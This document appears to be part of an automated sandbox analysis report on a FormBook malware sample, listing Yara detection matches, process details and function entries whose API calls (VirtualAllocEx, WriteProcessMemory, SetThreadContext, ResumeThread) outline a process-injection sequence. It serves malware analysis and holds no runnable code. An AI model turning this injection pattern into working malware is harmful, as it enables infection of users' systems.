Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: control.exe PID: 2016 Parent PID: 1764

General

Start time:	14:47:41
Start date:	15/12/2021
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xe0000
File size:	113152 bytes
MD5 hash:	9130377F87A2153FEAB900A00EA1EBFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: hkdf.exe PID: 3004 Parent PID: 2420 hkdf.exeCOMMON

Executed Functions

Function 00490C25, Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

fCl, xrefs: 00490C75
fCl, xrefs: 00490C94

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: fCl$fCl
API String ID: 0-3166565758
Opcode ID: e83653527bed9bb1c78ffc5deffb52367a896598b4cf4cee94c5c4e599e17996
Instruction ID: 8bf48c4d2e5a83233aa6a44d448688f5a0a9d330934d217327815ce163541edd
Opcode Fuzzy Hash: e83653527bed9bb1c78ffc5deffb52367a896598b4cf4cee94c5c4e599e17996
Instruction Fuzzy Hash: 2341C330900628CBDB65DF64CD84BD9B7B2FF89304F1085EAD509AB365DB319E859F50

Uniqueness

Uniqueness Score: -1.00%

Function 00491D90, Relevance: 2.6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

PS.l, xrefs: 00491E5B
PS.l, xrefs: 00491E4B

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: PS.l$PS.l
API String ID: 0-1911758541
Opcode ID: a19e923f5813664a561223cb7fea326ad984987b4a37ff549512b83532365c98
Instruction ID: 29b93758bb0e01e240a95d2cd8e4c255d8607f437569714e005cc03161313a75
Opcode Fuzzy Hash: a19e923f5813664a561223cb7fea326ad984987b4a37ff549512b83532365c98
Instruction Fuzzy Hash: 09313A74E0420ADFCF44DFA9D5809AEBBB2EB88300F60D4A6D805A7324E7349A418B55

Uniqueness

Uniqueness Score: -1.00%

Function 00B9918D, Relevance: 1.8, APIs: 1, Instructions: 327processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B9945F

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b0ad7fd0b9b28bda6e71172b8ba88b84b363caf3f01ecad5b23c2f58cec5fad2
Instruction ID: 921a12f6444ad3bba38724af81c93316922ecabcd28d3e7c72222cb21f078881
Opcode Fuzzy Hash: b0ad7fd0b9b28bda6e71172b8ba88b84b363caf3f01ecad5b23c2f58cec5fad2
Instruction Fuzzy Hash: EBC10270D002298BDF64CFA8C841BEEBBB6FF49304F1095A9D819B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00B99198, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B9945F

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6be9092a54d06c2037cacd01f3ef84413bd154b23078ada49198fa8c189d6c2e
Instruction ID: fafca9a2b41d426aa4bbbaf3ca795d959812ac70f98468ecbc858680b3e0603f
Opcode Fuzzy Hash: 6be9092a54d06c2037cacd01f3ef84413bd154b23078ada49198fa8c189d6c2e
Instruction Fuzzy Hash: 11C1F270D002299FDF60CFA8C841BEEBBB6BB49304F1095A9D819B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00B98DF9, Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B98ED3

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9388da1ea0f8ea10abcfac1ea4139c56b11d7bcbc4bbf1c022acbaf9cf76cc10
Instruction ID: 083b4ff6823ff6aa4f540f88558af35a9477e861da1fc3fb8ac1e971fb94fea1
Opcode Fuzzy Hash: 9388da1ea0f8ea10abcfac1ea4139c56b11d7bcbc4bbf1c022acbaf9cf76cc10
Instruction Fuzzy Hash: 804198B5D012589FCF00CFA9D984AEEBBF1BB49314F24942AE818B7210D774AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B98E00, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B98ED3

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e4ff5112beb305a55423d9de7c8f7de9e29557e9fc7cd2c41d26fb2678c678a9
Instruction ID: 5ea7ffdfd9f7cf5af04ec5c5e75b6493e6bbf9c6b492faa447e21fcfb5558608
Opcode Fuzzy Hash: e4ff5112beb305a55423d9de7c8f7de9e29557e9fc7cd2c41d26fb2678c678a9
Instruction Fuzzy Hash: 354188B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE815B7210D774AA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B98F59, Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B99012

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b6ca4fafeb758314a3afef857993dd93cce9832260ffdce92b44c18cf94e2113
Instruction ID: b3158b441af4f9e97a8ff08f33013fd867c9120efb0c8cc6f000799d21e2081c
Opcode Fuzzy Hash: b6ca4fafeb758314a3afef857993dd93cce9832260ffdce92b44c18cf94e2113
Instruction Fuzzy Hash: B341BBB9D042589FCF10CFA9D884AEEFBB1BF49310F24942AE815B7210D775A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B98F60, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B99012

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6c01d80b6c669519532c36dc9834caea60e0295a3f8d2aca9730b377d9ef274c
Instruction ID: a89a5702527d74901a26080b0fd6eb353514851f5c93f50a91bf3117d8f01e62
Opcode Fuzzy Hash: 6c01d80b6c669519532c36dc9834caea60e0295a3f8d2aca9730b377d9ef274c
Instruction Fuzzy Hash: 8341AAB9D002589FCF10CFA9D884AEEFBB5BF49314F24942AE815B7200D775AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B98CD8, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B98D82

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 10b8202adf5c9ead7f0f6479007d71c66ec20cb670cbde086d2076dca1d99dc3
Instruction ID: 8308d6413493dac699e6986030cd9ccca44c180af404d270416dbc089060ce1e
Opcode Fuzzy Hash: 10b8202adf5c9ead7f0f6479007d71c66ec20cb670cbde086d2076dca1d99dc3
Instruction Fuzzy Hash: 8E4199B8D002589FCF10CFA9D884ADEFBB5BF49314F20942AE815B7210D775A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B98CD7, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B98D82

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1752c31423142441d4d17f263aef38c3732202a936fa52b2c6b258f20ce1abf7
Instruction ID: 841eaad05a5ed9fa8abe2a7a414f1983ed997bb60f9ef4263e78a04ebb871898
Opcode Fuzzy Hash: 1752c31423142441d4d17f263aef38c3732202a936fa52b2c6b258f20ce1abf7
Instruction Fuzzy Hash: AF41AAB8D002589FCF10CFA9D880ADEFBB1BF49314F20942AE815B7210D775A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00B98BA8, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00B98C57

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 003ae228aec181d5656ef41484cd80dc8830248af25d52740c316894fb7d90df
Instruction ID: e915bcd0111622a0d0a82c6b69e3f8142eb82e6409f97b9cc1812841bbf91c40
Opcode Fuzzy Hash: 003ae228aec181d5656ef41484cd80dc8830248af25d52740c316894fb7d90df
Instruction Fuzzy Hash: CB419CB5D012589FCF10CFA9D884ADEBBF5BF49314F24842AE415B7240D778AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B98BA7, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00B98C57

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 825feedfbd1fa4da62e5318673e203aeaf73855631cd55e297b70098205cde54
Instruction ID: 9a590d13e59f4dcb5e3f2a6787518654e145a887b0402d599b27c322fdeb6a41
Opcode Fuzzy Hash: 825feedfbd1fa4da62e5318673e203aeaf73855631cd55e297b70098205cde54
Instruction Fuzzy Hash: 2F419AB5D012589FCF10CFA9D884AEEBBF1BF49314F24846AE415B7240D778AA85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B98AB8, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00B98B36

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0e3bee1fe4bf42020d618d0eb1c60f6d316aa016cd50ccd8339e876417df0161
Instruction ID: f7ac64d68995a379f8128d41f8cbd204fd3067d7a3fed564d1c500cef41bf55d
Opcode Fuzzy Hash: 0e3bee1fe4bf42020d618d0eb1c60f6d316aa016cd50ccd8339e876417df0161
Instruction Fuzzy Hash: 3031AAB4D012189BCF10CFA9E884ADEFBB5AF49314F24942AE815B7200D775A941CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B98AB7, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00B98B36

Memory Dump Source

Source File: 00000004.00000002.423769890.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2a8d59b90cfa7444164e715c0b3855c79ecc90e4f36a6696f4044d2a5c22d9e4
Instruction ID: d4c78efb434637eb32fdf6a014408b5b2ff8e71fe5348a5830051f9ad9054988
Opcode Fuzzy Hash: 2a8d59b90cfa7444164e715c0b3855c79ecc90e4f36a6696f4044d2a5c22d9e4
Instruction Fuzzy Hash: 8B31CAB8D012589FCF10CFA9E884ADEFBB5AF49314F24842AE815B7200C775A901CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004900AC, Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

H|(, xrefs: 004900AC

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: H|(
API String ID: 0-938974058
Opcode ID: 74c85969763d132d3ec51a0d62b5dc89b34ba8864892776a81a3294d3e4dc41a
Instruction ID: 3ceac1643b93c884924ee68d1efcdf826a7e7c1b2151860cd8724a06e7affaf4
Opcode Fuzzy Hash: 74c85969763d132d3ec51a0d62b5dc89b34ba8864892776a81a3294d3e4dc41a
Instruction Fuzzy Hash: 43217170E15209EFCB04DFA9C5809AEFBF2EF89310F20D9BA8408A7254D7349A419F45

Uniqueness

Uniqueness Score: -1.00%

Function 00492200, Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

ZiN, xrefs: 00492296

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: ZiN
API String ID: 0-2265799387
Opcode ID: b42100d078c600cd2b14272414b820e2ea4fce2e55122adb4d1e31b7e68aa841
Instruction ID: 2a8dde8d9ca538244467c2bacaa00f1e9a9ab12a481ff804ae618f993c9f23d2
Opcode Fuzzy Hash: b42100d078c600cd2b14272414b820e2ea4fce2e55122adb4d1e31b7e68aa841
Instruction Fuzzy Hash: 55116A70E19209EFCB44CFA9DA401AEBFF2AF89300F2484F7D408A7255D6789A018B55

Uniqueness

Uniqueness Score: -1.00%

Function 00490469, Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

@}(, xrefs: 004904FF

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: @}(
API String ID: 0-553646995
Opcode ID: 7169c7f8faf96f811d61fe0a3ba12c0bfb8f083556385122ca5fb5bbe72d94e2
Instruction ID: d0895bbf0aa768ff25e7f1594e61ce0be9d5f7a6b200b7d3f9261a017ffbea6e
Opcode Fuzzy Hash: 7169c7f8faf96f811d61fe0a3ba12c0bfb8f083556385122ca5fb5bbe72d94e2
Instruction Fuzzy Hash: 9D119074E05208EFCB49DFB5D54859EBFB6EB85300F20D5BA8505A73A4EB388A00CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00490478, Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

@}(, xrefs: 004904FF

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: @}(
API String ID: 0-553646995
Opcode ID: 279273a444a617fb9ef0b71c4bfabb91ab547f26de7209751c5cea42fde0f8da
Instruction ID: 31806ac1e2fe07f4c7d69a4fdad17b7577eb89eb90fcfac72e168e6bfd61a2af
Opcode Fuzzy Hash: 279273a444a617fb9ef0b71c4bfabb91ab547f26de7209751c5cea42fde0f8da
Instruction Fuzzy Hash: B3119174E05208EFCB48DFB1D5449AEBBB6EB85300F20D5BA8505A7394D7389A40DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0049120B, Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

TN.l, xrefs: 00491258

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: TN.l
API String ID: 0-1345110908
Opcode ID: a27d229714ccf5f92a2d017ff35bed8a9565eda73df7f1aaf86e9a3afe063574
Instruction ID: 08c8988b50239083791dbc389ee8f4205d072af24bf20a18a55ef1de42801939
Opcode Fuzzy Hash: a27d229714ccf5f92a2d017ff35bed8a9565eda73df7f1aaf86e9a3afe063574
Instruction Fuzzy Hash: DD11F874A00219AFCB60DF64D984BDDB7B1BB49300F5080E5E409AB364DB34AE85DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00491577, Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

.@l, xrefs: 0049158A

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: .@l
API String ID: 0-2179369065
Opcode ID: 1edb70598c8e2efa31e18d5b7d19ad9a9a9e3c3e2b1dffa978e7c0ba6f679a26
Instruction ID: ba8c109c3092f27bfe7799d2a3d81a2c870f4c1dbae16dd1862fcb9a18890039
Opcode Fuzzy Hash: 1edb70598c8e2efa31e18d5b7d19ad9a9a9e3c3e2b1dffa978e7c0ba6f679a26
Instruction Fuzzy Hash: CB0119709022188FDB24DFA4C989B8EBBF2AF85315F5180A9C40A6B250C774DE81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00492BE1, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77d965c7d2df7673cd2c61faa39cf3863e724aca7276b8da15d5e3455f177ebb
Instruction ID: 86e23d5ba8ce7a9aa12b070201349670f0c9070a842c7545af5d17450ec07fa4
Opcode Fuzzy Hash: 77d965c7d2df7673cd2c61faa39cf3863e724aca7276b8da15d5e3455f177ebb
Instruction Fuzzy Hash: 6041AD70A042099FCF11DFA9C6C496EFFF1BF49304B11896AD15AEB201D7B8E900CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00492A50, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff1d7ac226af2659a431be25fc301b47be7ff325076f6df44a2803f26f195efc
Instruction ID: f67b397db6b486deb48f7911524bf7c5eb34d8afd66ee9a4e0b885dec2e0b407
Opcode Fuzzy Hash: ff1d7ac226af2659a431be25fc301b47be7ff325076f6df44a2803f26f195efc
Instruction Fuzzy Hash: 7A31B571A04209AFDF059FA1CA406EEBFB2BF84318F24803AD51567241DBB85906D769

Uniqueness

Uniqueness Score: -1.00%

Function 00492738, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369a2b89270d0480932c869005936aef800a4cdbb614dfc55bac34d6de2c7462
Instruction ID: 365dfaf5ccf9c5b7475f567ef21f59a34aba197ee4922d33debea09f35e7fde1
Opcode Fuzzy Hash: 369a2b89270d0480932c869005936aef800a4cdbb614dfc55bac34d6de2c7462
Instruction Fuzzy Hash: 412131387052009FCB18EB78E95C9293BA6BB89711B1584BBE507CB3A1DE79CC81CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0028D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423234274.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e16f7169037b311090d789b10b468a05dc70b0a620a5f1d7fe99fd4811342d6
Instruction ID: 4aaec4d8d7398b8a836af1864d051884d4fb451e5c92b3c9c349f95a36601270
Opcode Fuzzy Hash: 7e16f7169037b311090d789b10b468a05dc70b0a620a5f1d7fe99fd4811342d6
Instruction Fuzzy Hash: 67212578614304DFDB14EF50E884B16BB65EB84314F34C9A9D8094B3C6C376D86BCB61

Uniqueness

Uniqueness Score: -1.00%

Function 0028D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423234274.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e24cde1b05abf7fa521bb0d6e46478c1aa1bb50879a1ab409139b73cb4e78fe
Instruction ID: a3461f9ebb6798f2a266702860eb57a93f959cf3ed348d2445f355f2d721aad1
Opcode Fuzzy Hash: 4e24cde1b05abf7fa521bb0d6e46478c1aa1bb50879a1ab409139b73cb4e78fe
Instruction Fuzzy Hash: FB21F579514304DFDB01EF54D984B16BB65FB84314F24C9A9DC094B2CAC376D86ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00492131, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c5e68bb69a3d565ad4cf2f9e11505ea276a0a9e124229108a6129ea0d7c419f
Instruction ID: 259175fb39868d942d0eb922b216732df0589f3aeb725be339d0037223cf9199
Opcode Fuzzy Hash: 9c5e68bb69a3d565ad4cf2f9e11505ea276a0a9e124229108a6129ea0d7c419f
Instruction Fuzzy Hash: 64215C70D09249AFCB84CFB9D9855AEBFB2AF8A300F14C0ABC505E3321D6349A50CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00492140, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d23cfe49e142e30f6a891937468e7ebc9d843099baca473797706d8b3290a05
Instruction ID: a4692c28c31b933b5e455c870f923a51e2e11fbba3b613e7afc2baa0f9495fd6
Opcode Fuzzy Hash: 8d23cfe49e142e30f6a891937468e7ebc9d843099baca473797706d8b3290a05
Instruction Fuzzy Hash: 78111C70D05209AFCB84CFA5D9855AEBBB6EF89300F20C0ABC505A3314D7349A518B85

Uniqueness

Uniqueness Score: -1.00%

Function 0028D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423234274.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee09a6a21ebeab8848b6a249867da1b1c9250110e22f069202852db0ad91f33d
Instruction ID: eb36df0abd4351408d4052f9173e68d5a0d7f0ba01e83a198359b9076c9d9fcb
Opcode Fuzzy Hash: ee09a6a21ebeab8848b6a249867da1b1c9250110e22f069202852db0ad91f33d
Instruction Fuzzy Hash: 0111BB79944280DFDB02DF14D5C4B15BBA1FB84314F28C6A9DC094B29AC33AD82ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0028D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423234274.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee09a6a21ebeab8848b6a249867da1b1c9250110e22f069202852db0ad91f33d
Instruction ID: 8eb9d7cc5d11bad93441d6fc2625fb58f2d6e5b3f0fc977eb2ba784f6d15694f
Opcode Fuzzy Hash: ee09a6a21ebeab8848b6a249867da1b1c9250110e22f069202852db0ad91f33d
Instruction Fuzzy Hash: F111D079504280CFDB11DF14D5C4B15FF61FB44314F24C6A9D8094B696C33AD81BCB61

Uniqueness

Uniqueness Score: -1.00%

Function 001FD1C1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423125523.00000000001FD000.00000040.00000001.sdmp, Offset: 001FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df77de2c6d3cec3b7bc12278bdc0e1db26025641f749f75d9e166eb40a728d9b
Instruction ID: c55c4ea8c779af501a72b73e3b3a2bf0f8fc6f3f6456dd6346608fad62a6ddd2
Opcode Fuzzy Hash: df77de2c6d3cec3b7bc12278bdc0e1db26025641f749f75d9e166eb40a728d9b
Instruction Fuzzy Hash: 1A01A7354087589BEB108A65E888B77BB9DEF51724F28C45AEE055A282C378DD40D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 001FD1C0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423125523.00000000001FD000.00000040.00000001.sdmp, Offset: 001FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4834b0e4454f03a9077f46bf5f89f95f6dea78641a92660c3bdcc056f370512f
Instruction ID: fbc507dfc101071a677a6ab3bf66ee471ab90abe45537e0c6e73fe39badee111
Opcode Fuzzy Hash: 4834b0e4454f03a9077f46bf5f89f95f6dea78641a92660c3bdcc056f370512f
Instruction Fuzzy Hash: 6BF06276404744AFEB108A55E888B77FF98EF51724F28C55AED185B282C3789C44CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 004922C0, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f72538a6ce2db18d840313e6fe46fb9e2b70497073c6fd92ed25392de56bdf
Instruction ID: e5a7e70a8ca42f8df49f6bb202deb31c7243401ad44bf50f4064bd2562890d2e
Opcode Fuzzy Hash: e7f72538a6ce2db18d840313e6fe46fb9e2b70497073c6fd92ed25392de56bdf
Instruction Fuzzy Hash: BCF04930959388DFC7A1EFB8E44898DBFB4EF02704F1585EAD80497222D7389A44CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00491486, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f4497fca624bfd023ca5dbc7bbf323e90c50e5aa829cd44bdedf5a42f4e5cf
Instruction ID: 95bd42fd49a444958e190c6bfbc3cc20a4a52c114de7eecd52c5c33151695ee7
Opcode Fuzzy Hash: 76f4497fca624bfd023ca5dbc7bbf323e90c50e5aa829cd44bdedf5a42f4e5cf
Instruction Fuzzy Hash: 7FF08230911708CFDB20DBB4D544ADCBBB1FF8A310F1146AAD459AB6A4E770A991CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00492D50, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.423420132.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8cbb58f8c9bc67f13ef9ac07751539d393445edb423ba71cf1e4d76dccfe49
Instruction ID: f03d23280c7832b4287331b70650ab99ea0f3759d3d9ebae33b7376bf79bf41f
